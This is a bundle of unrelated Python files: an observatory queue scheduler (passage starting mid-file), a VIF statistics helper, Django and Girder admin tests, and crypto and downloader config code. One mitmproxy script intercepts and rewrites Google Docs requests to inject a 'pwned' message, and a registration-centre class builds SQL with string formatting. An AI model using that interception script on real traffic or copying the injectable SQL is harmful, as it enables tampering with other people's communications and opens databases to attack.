# fields not hit by the airmass cut)
if np.abs(ha) >= (5.95 * u.hourangle).to(u.degree).value:
idx += 1
continue
# 1) HA < -17.6 deg && Dec < -22 deg is rejected for both track & stow because of interference with FFI.
if (ha <= -17.6) & (dec <= -22):
idx += 1
continue
# West of HA -17.6 deg, Dec < -45 deg is rejected for tracking because of the service platform in the south.
if (ha >= -17.6) & (dec <= -45):
idx += 1
continue
# fabs(HA) > 3 deg is rejected for Dec < -46 to protect the shutter "ears".
if (np.abs(ha) >= 3.) & (dec <= -46):
idx += 1
continue
# dec > 87.5 is rejected
if (dec > 87.5):
idx += 1
continue
break
next_obs = {'target_field_id': int(self.queue.iloc[idx].field_id),
'target_ra': self.queue.iloc[idx].ra,
'target_dec': self.queue.iloc[idx].dec,
'target_filter_id': self.queue.iloc[idx].filter_id,
'target_program_id': int(self.queue.iloc[idx].program_id),
'target_subprogram_name': self.queue.iloc[idx].subprogram_name,
'target_program_pi': self.queue.iloc[idx].program_pi,
'target_exposure_time': self.queue.iloc[idx].exposure_time * u.second,
'target_sky_brightness': 0.,
'target_limiting_mag': 0.,
'target_metric_value': 0.,
'target_total_requests_tonight': 1,
'target_mode_num': int(self.queue.iloc[idx].mode_num),
'target_num_images': int(self.queue.iloc[idx].num_images),
'request_id': self.queue.index[idx]}
return next_obs
def _remove_requests(self, request_id):
"""Remove a request from the queue"""
try:
if self.queue.loc[request_id,'n_repeats'] > 1:
self.queue.loc[request_id,'n_repeats'] -= 1
else:
self.queue = self.queue.drop(request_id)
except Exception:
self.logger.exception(f'Failure removing request {request_id}')
def _return_queue(self):
# by construction the list queue is already in order
queue = self.queue.copy()
queue['ordered'] = True
return queue
class RequestPool(object):
def __init__(self):
# initialize empty dataframe to add to
self.pool = pd.DataFrame()
pass
def add_request_sets(self, program_id, subprogram_name, program_pi,
field_ids, filter_ids, intranight_gap, exposure_time,
total_requests_tonight, priority=1):
"""program_ids must be scalar"""
assert (scalar_len(program_id) == 1)
assert (scalar_len(subprogram_name) == 1)
n_fields = scalar_len(field_ids)
if n_fields == 1:
# see if it's iterable or not
try:
iterator = iter(field_ids)
except TypeError:
# if not, assume it's a scalar and wrap in a list
field_ids = [field_ids]
# build df as a list of dicts
request_sets = []
for i, field_id in enumerate(field_ids):
request_sets.append({
'program_id': program_id,
'subprogram_name': subprogram_name,
'program_pi': program_pi,
'field_id': field_id,
'filter_ids': filter_ids.copy(),
# pandas doesn't play well with astropy quantities, so change
# back to seconds
'intranight_gap_min': intranight_gap.to(u.minute).value,
'exposure_time': exposure_time.to(u.second).value,
'total_requests_tonight': total_requests_tonight,
'priority': priority})
self.pool = self.pool.append(pd.DataFrame(request_sets),
ignore_index=True)
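# Illustrative usage (hypothetical values): observing programs call this once per
# request set, with astropy quantities for the gap and exposure time, e.g.
#
#     rp.add_request_sets(1, 'example_subprogram', 'Example_PI',
#                         [650, 651], [1, 2], 60 * u.minute,
#                         30 * u.second, 4)
#
# which appends one row per field, with filter_ids copied so later removals do not
# share state between rows. All identifiers above are made up for illustration.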
def n_request_sets(self):
return len(self.pool)
def remove_request_sets(self, request_set_ids):
"""Remove completed or otherwise unwanted requests by request_id
request_ids : scalar or list
requests to drop (index of self.pool)"""
self.pool = self.pool.drop(request_set_ids)
def remove_request(self, request_set_id, filter_id):
"""Remove single completed request from a request set.
request_set_id: scalar
request set to modify (index of self.pool)
filter_id: scalar
filter_id of completed observation"""
rs = self.pool.loc[request_set_id].copy()
filters = rs['filter_ids']
# this is another step that shouldn't be necessary...
filters.remove(filter_id)
if len(filters) == 0:
self.remove_request_sets(request_set_id)
else:
self.pool.at[request_set_id, 'filter_ids'] = filters
def clear_all_request_sets(self):
self.pool = pd.DataFrame()
# utils for examining inputs
def calc_pool_stats(df, intro=""):
"""
df = Q.rp.pool"""
stats_str = intro + "\n"
stats_str += "\t{} request sets\n".format(len(df))
stats_str += "\t{} unique fields\n".format(len(set(df.field_id)))
for prog_id in PROGRAM_IDS:
w = df.program_id == prog_id
stats_str += "\tProgram {}:\n".format(prog_id)
stats_str += "\t\t{} request sets\n".format(np.sum(w))
stats_str += "\t\t{} unique fields\n".format(
len(set(df.loc[w, 'field_id'])))
stats_str += "\t\t{} median requests tonight per field\n".format(
np.median(df.loc[w, 'total_requests_tonight']))
return stats_str
def calc_queue_stats(df, current_state, intro=""):
"""
df = Q.queue"""
stats_str = intro + "\n"
stats_str += "\t{} queued requests\n".format(len(df))
stats_str += "\t{} unique fields\n".format(len(set(df.field_id)))
for prog_id in PROGRAM_IDS:
w = df.program_id == prog_id
stats_str += "\tProgram {}:\n".format(prog_id)
if np.sum(w) == 0:
stats_str += "\t\tNo queued requests!\n"
continue
stats_str += "\t\t{} requests\n".format(np.sum(w))
stats_str += "\t\t{} unique fields\n".format(
len(set(df.loc[w, 'field_id'])))
walt = w & (df.loc[w, 'altitude'] > 20)
stats_str += "\t\t{} fields above altitude cut\n".format(
np.sum(walt))
# wfirst = walt & (df.loc[walt, 'request_number_tonight'] == 1)
# stats_str += "\t\t{} requests awaiting first obs tonight\n".format(
# np.sum(wfirst))
return stats_str
|
import pandas as pd
import statsmodels.api as sm
from patsy import dmatrices
from statsmodels.stats.outliers_influence import variance_inflation_factor
from .condition_fun import *
def vif(dt, y, x=None, merge_coef = False, positive="bad|1"):
'''
Variance Inflation Factors
------
vif calculates variance-inflation factors for logistic regression.
Params
------
dt: A data frame with both x (predictor/feature) and y (response/label) variables.
y: Name of y variable.
x: Name of x variables. Default is None. If x is None,
then all variables except y are counted as x variables.
merge_coef: Logical, whether to merge with coefficients of model summary matrix. Defaults to False.
positive: Value of positive class, default "bad|1".
Returns
------
data frame
A data frame with columns for the variables and their VIF values.
Examples
------
import scorecardpy as sc
# load data
dat = sc.germancredit()
# Example I
sc.vif(dat,
y = 'creditability',
x=['age_in_years', 'credit_amount', 'present_residence_since'],
merge_coef=True)
'''
dt = dt.copy(deep=True)
if isinstance(y, str):
y = [y]
if isinstance(x, str) and x is not None:
x = [x]
if x is not None:
dt = dt[y+x]
# check y
dt = check_y(dt, y, positive)
# x variables
x = x_variable(dt, y, x)
# dty, dtx
ytrain = dt.loc[:,y]
Xtrain = dt.loc[:,x]
Xtrain = sm.add_constant(Xtrain)
# logistic regression
lrfit = sm.GLM(
ytrain.astype(float),
Xtrain.astype(float),
family=sm.families.Binomial()
).fit()
# vif
dty, dtX = dmatrices(' ~ '.join([y[0], '+'.join(x)]), data=dt, return_type="dataframe")
# use the design-matrix columns rather than hard-coded example names
dfvif = pd.DataFrame({
'variables': list(dtX.columns),
'vif': [variance_inflation_factor(dtX.values, i) for i in range(dtX.shape[1])]
})
# merge with coef
if merge_coef:
dfvif = pd.merge(
lrfit.summary2().tables[1].reset_index().rename(columns = {'index':'variables'}),
dfvif,
on = 'variables', how='outer'
)
return dfvif
|
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
# RiBuild Modules
import datetime
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
datetime.datetime(2019, 5, 24, 14, 46, 36, 813029)
|
import pytezos
from django.contrib.auth.models import Permission
from django.test import TestCase
from django.urls.base import reverse
from apps.wallet.models import (
CashOutRequest,
MetaTransaction,
PaperWallet,
Transaction,
Wallet,
WalletPublicKeyTransferRequest,
)
from project.utils_testing import EcouponTestCaseMixin
class WalletAdminTestCase(EcouponTestCaseMixin, TestCase):
def test_only_staff_see_wallet_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_wallet_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(Permission.objects.get(codename="view_wallet"))
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_wallet")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_wallets(self):
url = reverse("admin:wallet_wallet_changelist")
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_wallet")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(
list(Wallet.objects.filter(currency=self.currency)),
key=lambda x: x.wallet_id,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(list(Wallet.objects.all()), key=lambda x: x.wallet_id),
)
class PaperWalletAdminTestCase(EcouponTestCaseMixin, TestCase):
# TODO: FIXME: add test for admin actions
def test_only_staff_see_wallet_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_paperwallet_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_paperwallet")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_paperwallet")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_wallets(self):
url = reverse("admin:wallet_paperwallet_changelist")
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_paperwallet")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(
list(PaperWallet.objects.filter(currency=self.currency)),
key=lambda x: x.wallet_id,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(list(resp.context_data["cl"].queryset), key=lambda x: x.wallet_id),
sorted(list(PaperWallet.objects.all()), key=lambda x: x.wallet_id),
)
class TransactionAdminTestCase(EcouponTestCaseMixin, TestCase):
# TODO: FIXME: add test for admin actions
def test_only_staff_see_transaction_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_transaction_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_transaction")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_transaction")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_transactions(self):
url = reverse("admin:wallet_transaction_changelist")
def sorting_fun(x):
if x.to_wallet:
return x.to_wallet.wallet_id
else:
return x.amount
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_transaction")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(Transaction.objects.filter(to_wallet__currency=self.currency)),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(Transaction.objects.all()), key=sorting_fun),
)
class MetaTransactionAdminTestCase(EcouponTestCaseMixin, TestCase):
def test_only_staff_see_transaction_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_metatransaction_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_metatransaction")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_metatransaction")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_transactions(self):
url = reverse("admin:wallet_metatransaction_changelist")
def sorting_fun(x):
if x.to_wallet:
return x.to_wallet.wallet_id
else:
return x.amount
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_metatransaction")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(MetaTransaction.objects.filter(to_wallet__currency=self.currency)),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(MetaTransaction.objects.all()), key=sorting_fun),
)
class WalletPublickeyRequestAdminTestCase(EcouponTestCaseMixin, TestCase):
def setUp(self):
super().setUp()
new_key = pytezos.crypto.key.Key.generate()
WalletPublicKeyTransferRequest.objects.create(
wallet=self.wallet_1,
old_public_key=self.wallet_1.public_key,
new_public_key=new_key.public_key(),
)
new_key = pytezos.crypto.key.Key.generate()
WalletPublicKeyTransferRequest.objects.create(
wallet=self.wallet_1_2_2,
old_public_key=self.wallet_1_2_2.public_key,
new_public_key=new_key.public_key(),
)
def test_only_staff_see_walletpublickeytransferrequest_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_walletpublickeytransferrequest_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_walletpublickeytransferrequest")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_walletpublickeytransferrequest")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_walletpublickeytransferrequest(self):
url = reverse("admin:wallet_walletpublickeytransferrequest_changelist")
def sorting_fun(x):
return x.wallet.wallet_id
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_walletpublickeytransferrequest")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(
WalletPublicKeyTransferRequest.objects.filter(
wallet__currency=self.currency
)
),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(WalletPublicKeyTransferRequest.objects.all()), key=sorting_fun),
)
class CashOutRequestAdminTestCase(EcouponTestCaseMixin, TestCase):
# TODO: FIXME: add test for admin action
def setUp(self):
super().setUp()
tx1 = Transaction.objects.create(
from_wallet=self.wallet_1, to_wallet=self.currency.owner_wallet, amount=5
)
CashOutRequest.objects.create(
transaction=tx1,
beneficiary_name="baba",
beneficiary_iban="CH93 0076 2011 6238 5295 7",
)
tx2 = Transaction.objects.create(
from_wallet=self.wallet_2_2,
to_wallet=self.currency_2.owner_wallet,
amount=5,
)
CashOutRequest.objects.create(
transaction=tx2,
beneficiary_name="baba",
beneficiary_iban="CH93 0076 2011 6238 5295 7",
)
def test_only_staff_see_cashoutrequest_admin(self):
self.client.force_login(self.user)
url = reverse("admin:wallet_cashoutrequest_changelist")
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.user.user_permissions.add(
Permission.objects.get(codename="view_cashoutrequest")
)
self.user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 302)
self.assertTrue(resp.url.startswith("/admin/login"))
self.client.force_login(self.staff_user)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_cashoutrequest")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
def test_see_correct_cashoutrequest(self):
url = reverse("admin:wallet_cashoutrequest_changelist")
def sorting_fun(x):
return x.transaction.from_wallet.wallet_id
self.staff_user.user_permissions.add(
Permission.objects.get(codename="view_cashoutrequest")
)
self.client.force_login(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
list(resp.context_data["cl"].queryset),
[],
)
self.currency.users.add(self.staff_user)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(
list(
CashOutRequest.objects.filter(
transaction__from_wallet__currency=self.currency
)
),
key=sorting_fun,
),
)
self.staff_user.user_permissions.add(
Permission.objects.get(codename="can_view_all_currencies")
)
resp = self.client.get(url)
self.assertEqual(resp.status_code, 200)
self.assertEqual(
sorted(
list(resp.context_data["cl"].queryset),
key=sorting_fun,
),
sorted(list(CashOutRequest.objects.all()), key=sorting_fun),
)
|
# constants.py
FRAME_MAX_X = 500
FRAME_MAX_Y = 500
CELL_WIDTH = 10
# basic colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
RED = (255, 0, 0)
|
import pathlib
from types import ModuleType
from jinja2 import Template
from omymodels.models.gino import core as g
from omymodels.models.pydantic import core as p
from omymodels.models.dataclass import core as d
from omymodels.models.sqlalchemy import core as s
from omymodels.models.sqlalchemy_core import core as sc
models = {
"gino": g,
"pydantic": p,
"dataclass": d,
"sqlalchemy": s,
"sqlalchemy_core": sc,
}
supported_models = list(models.keys())
def get_model(models_type: str) -> ModuleType:
model = models.get(models_type)
return model
def get_generator_by_type(models_type: str):
model = get_model(models_type)
if not model:
raise ValueError(
f"Unsupported models type {models_type}. Possible variants: {supported_models}"
)
return getattr(model, "ModelGenerator")()
def render_jinja2_template(models_type: str, models: str, headers: str) -> str:
template_file = (
pathlib.Path(__file__).parent / "models" / models_type / f"{models_type}.jinja2"
)
with open(template_file) as t:
template = t.read()
template = Template(template)
params = {"models": models, "headers": headers}
return template.render(**params)
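# Illustrative usage (a sketch, not part of the original module): the two helpers
# are typically combined by a caller that already has rendered model code, e.g.
#
#     generator = get_generator_by_type("pydantic")
#     # ... use generator to build the models/headers strings, then:
#     output = render_jinja2_template("pydantic", models=models_str, headers=headers_str)
#
# where models_str and headers_str are assumed to be strings produced elsewhere.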
|
'''
Created on 1.12.2016
@author: Darren

Say you have an array for which the ith element is the price of a given stock on day i.
Design an algorithm to find the maximum profit. You may complete as many transactions as you like (i.e., buy one and sell one share of the stock multiple times). However, you may not engage in multiple transactions at the same time (i.e., you must sell the stock before you buy again).
'''
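# A minimal greedy sketch of one standard solution (not from the original file):
# because any number of non-overlapping transactions is allowed, the maximum
# profit is the sum of every positive day-to-day price increase.
def max_profit(prices):
    """Return the maximum profit from unlimited buy/sell transactions."""
    profit = 0
    for i in range(1, len(prices)):
        # take every upward move; equivalent to buying at each local minimum
        # and selling at the next local maximum
        if prices[i] > prices[i - 1]:
            profit += prices[i] - prices[i - 1]
    return profit


# Example: max_profit([7, 1, 5, 3, 6, 4]) == 7 (buy at 1, sell at 5; buy at 3, sell at 6)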
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2013 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import cherrypy
import json
from .. import base
from girder.constants import AccessType
def setUpModule():
base.startServer()
def tearDownModule():
base.stopServer()
class CollectionTestCase(base.TestCase):
def setUp(self):
base.TestCase.setUp(self)
admin = {
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'Admin',
'lastName': 'Admin',
'password': 'adminpassword',
'admin': True
}
self.admin = self.model('user').createUser(**admin)
user = {
'email': 'good@email.com',
'login': 'goodlogin',
'firstName': 'First',
'lastName': 'Last',
'password': 'goodpassword',
'admin': False
}
self.user = self.model('user').createUser(**user)
coll = {
'name': 'Test Collection',
'description': 'The description',
'public': True,
'creator': self.admin
}
self.collection = self.model('collection').createCollection(**coll)
def testCreateAndListCollections(self):
self.ensureRequiredParams(
path='/collection', method='POST', required=['name'],
user=self.admin)
# Try to create a collection anonymously; should fail
resp = self.request(path='/collection', method='POST', params={
'name': 'new collection'
})
self.assertStatus(resp, 401)
# Try to create a collection as non-admin user; should fail
resp = self.request(path='/collection', method='POST', params={
'name': 'new collection'
}, user=self.user)
self.assertStatus(resp, 403)
# Create the collection as the admin user, make it private
resp = self.request(path='/collection', method='POST', params={
'name': ' New collection ',
'description': ' my description ',
'public': 'false'
}, user=self.admin)
self.assertStatusOk(resp)
newCollId = resp.json['_id']
# Now attempt to list the collections as anonymous user
resp = self.request(path='/collection')
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
self.assertEqual(resp.json[0]['name'], self.collection['name'])
# Admin user should see both collections
resp = self.request(path='/collection', user=self.admin)
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 2)
self.assertEqual(resp.json[0]['name'], 'New collection')
self.assertEqual(resp.json[0]['description'], 'my description')
self.assertEqual(resp.json[1]['name'], self.collection['name'])
# Test text search
resp = self.request(path='/collection', user=self.admin, params={
'text': 'new'
})
self.assertStatusOk(resp)
self.assertEqual(len(resp.json), 1)
self.assertEqual(resp.json[0]['_id'], newCollId)
self.assertEqual(resp.json[0]['name'], 'New collection')
def testDeleteCollection(self):
# Requesting with no path should fail
resp = self.request(path='/collection', method='DELETE',
user=self.admin)
self.assertStatus(resp, 400)
# User without permission should not be able to delete collection
resp = self.request(path='/collection/%s' % self.collection['_id'],
method='DELETE', user=self.user)
self.assertStatus(resp, 403)
# Admin user should be able to delete the collection
resp = self.request(path='/collection/%s' % self.collection['_id'],
method='DELETE', user=self.admin)
self.assertStatusOk(resp)
coll = self.model('collection').load(self.collection['_id'], force=True)
self.assertEqual(coll, None)
|
import logging
import time
import cStringIO
from PIL import Image
from libmproxy.protocol.http import decoded
import re
def request(context, flow):
try:
logging.debug("request")
if (flow.request.pretty_host(hostheader=True).endswith("docs.google.com")):
#logging.debug("Before:")
#logging.debug(flow.request.content)
m = re.match(r'(?P<msg_start>[\w\W]+)(?P<msg_info>\[null,\d+,[^\]]+\])(?P<msg_end>[\w\W]+)', flow.request.content)
if not m:
# logging.debug("Match failed")
return 0
replace = (m.group('msg_start') + '[null,2, "You have been pwned!!!"]'+m.group('msg_end'))
flow.request.content = replace
logging.debug("Google table request was changed!")
#logging.debug(flow.request.content)
except Exception as e:
logging.debug("CHECK CODE, IDIOT!!!!!!!!!!!")
logging.debug(type(e))
logging.debug(e)
def start (context, argv):
logging.basicConfig(filename="log.log",level=logging.DEBUG)
logging.debug("============================================\n")
logging.debug(time.time())
logging.debug("Startup:\n")
context.log("start")
|
import numpy as np
import skimage.color
import skimage.filters
import skimage.io
import skimage.viewer
# read and display the original image
image = skimage.io.imread('images/coins.png')
viewer = skimage.viewer.ImageViewer(image)
viewer.show()
# grayscale and blur before thresholding
blur = skimage.color.rgb2gray(image)
sigma = 1.0  # smoothing amount; the original left sigma undefined
blur = skimage.filters.gaussian(blur, sigma=sigma)
# perform automatic (Otsu) thresholding
t = skimage.filters.threshold_otsu(blur)
mask = blur > t
viewer = skimage.viewer.ImageViewer(mask)
viewer.show()
# use the mask to select the "interesting" part of the image
sel = np.zeros_like(image)
sel[mask] = image[mask]
# display the result
viewer = skimage.viewer.ImageViewer(sel)
viewer.show()
|
# -*-coding:utf8-*-
import random
from abenc_bsw07 import *
import sqlite3
class RegistrationCenter:
def __init__(self):
self.groupObj = PairingGroup('SS512')
self.cpabe = CPabe_BSW07(self.groupObj)
(self.pk, self.mk) = self.cpabe.setup()
def initation(self):
# Xij key #############################
cs_secret_key = [random.getrandbits(1024), random.getrandbits(1024)]
# service use the pk mk attrs get sk and enc it
# sk = cpabe.keygen(pk, mk, attrs)
conn_01 = sqlite3.connect('service_01.db')
conn_02 = sqlite3.connect('service_02.db')
c_01 = conn_01.cursor()
c_02 = conn_02.cursor()
PK = str(self.pk)
MK = str(self.mk)
service_key_01 = str(cs_secret_key[0])
service_key_02 = str(cs_secret_key[1])
c_01.execute('insert into main.base_information (service_id, service_key, pk, mk) '
'values ("{}", "{}", "{}", "{}")'.format(1, service_key_01, PK, MK))
        c_02.execute('insert into main.base_information (service_id, service_key, pk, mk) '
                     'values ("{}", "{}", "{}", "{}")'.format(2, service_key_02, PK, MK))
conn_01.commit()
conn_01.close()
conn_02.commit()
conn_02.close()
def smart_car(self, user_id, mNBPW):
global service_key_01, service_key_02
pair_key_01 = random.getrandbits(1024)
pair_key_02 = random.getrandbits(1024)
conn_01 = sqlite3.connect('service_01.db')
conn_02 = sqlite3.connect('service_02.db')
c_01 = conn_01.cursor()
c_02 = conn_02.cursor()
cursor_01 = c_01.execute("SELECT service_key from main.base_information")
for row_01 in cursor_01:
service_key_01 = row_01[0]
cursor_02 = c_02.execute("SELECT service_key from main.base_information")
for row_02 in cursor_02:
service_key_02 = row_02[0]
c_01.execute("insert into main.authentica_information(user_id, user_fake_id, pair_key) "
"values (\"{}\", \"{}\", \"{}\")".format(user_id, user_id + 200, str(pair_key_01)))
c_02.execute("insert into main.authentica_information(user_id, user_fake_id, pair_key) "
"values (\"{}\", \"{}\", \"{}\")".format(user_id, user_id + 200, str(pair_key_02)))
conn_01.commit()
conn_02.commit()
conn_01.close()
conn_02.close()
M_01 = hash(str(hash(int(pair_key_01) ^ int(user_id))) + str(service_key_01))
M_02 = hash(str(hash(pair_key_02 ^ user_id)) + str(service_key_02))
N_01 = M_01 ^ mNBPW
N_02 = M_02 ^ mNBPW
NId_cs_01 = hash(str(1) + service_key_01)
NId_cs_02 = hash(str(2) + service_key_02)
# user temple_id ##############################################
temple_user_id = user_id + 200
#
attrs_01 = ['ONE', 'TWO', 'THREE']
attrs_02 = ['ONE', 'TWO', 'THREE']
sk_01 = self.cpabe.keygen(self.pk, self.mk, attrs_01)
sk_02 = self.cpabe.keygen(self.pk, self.mk, attrs_02)
service_result_01 = [1, N_01, NId_cs_01, attrs_01, sk_01]
service_result_02 = [2, N_02, NId_cs_02, attrs_02, sk_02]
sr = [service_result_01, service_result_02]
smart_car_result = [temple_user_id, sr, self.pk]
return smart_car_result
# base information
# service id, service_key , master_key, master_public_key
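# A hedged setup sketch, not part of the original code: the methods above
# assume service_01.db and service_02.db already contain the two tables used
# by initation() and smart_car(). The helper name and the TEXT column types
# are assumptions; everything is inserted as strings, so TEXT suffices.
def create_service_db(db_name):
    """Create the tables RegistrationCenter expects in one service database."""
    conn = sqlite3.connect(db_name)  # sqlite3 is imported at the top of this module
    c = conn.cursor()
    c.execute('create table if not exists base_information '
              '(service_id TEXT, service_key TEXT, pk TEXT, mk TEXT)')
    c.execute('create table if not exists authentica_information '
              '(user_id TEXT, user_fake_id TEXT, pair_key TEXT)')
    conn.commit()
    conn.close()
# Usage: create_service_db('service_01.db'); create_service_db('service_02.db')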
|
utc_offset = 8
data_extension = ".ill"
'''login token'''
login_token = "put your token here"
'''path'''
illust_data_path = "data\\"
illust_thbnl_path = "thumbnails\\"
illust_cache_path = "cache\\"
auth_head_path = "auth\\"
download_path = "your download folder\\"
r18_subfolder = "R-18\\"
gif_path = download_path
group_path = download_path
'''download param'''
max_download_thread = 4
'''detail param'''
tags_pre_line = 1
stream_per_load = 4
'''explore param'''
like_btn_size = 50
thumbnail_size = 360
pic_grid_row = 15
pic_grid_column = 2
nsfw = 0
'''proxy'''
proxies = {
'https': 'socks5://127.0.0.1:1080',
'http': 'socks5://127.0.0.1:1080'
}
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Copyright (c) 2012 Michael Hull.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
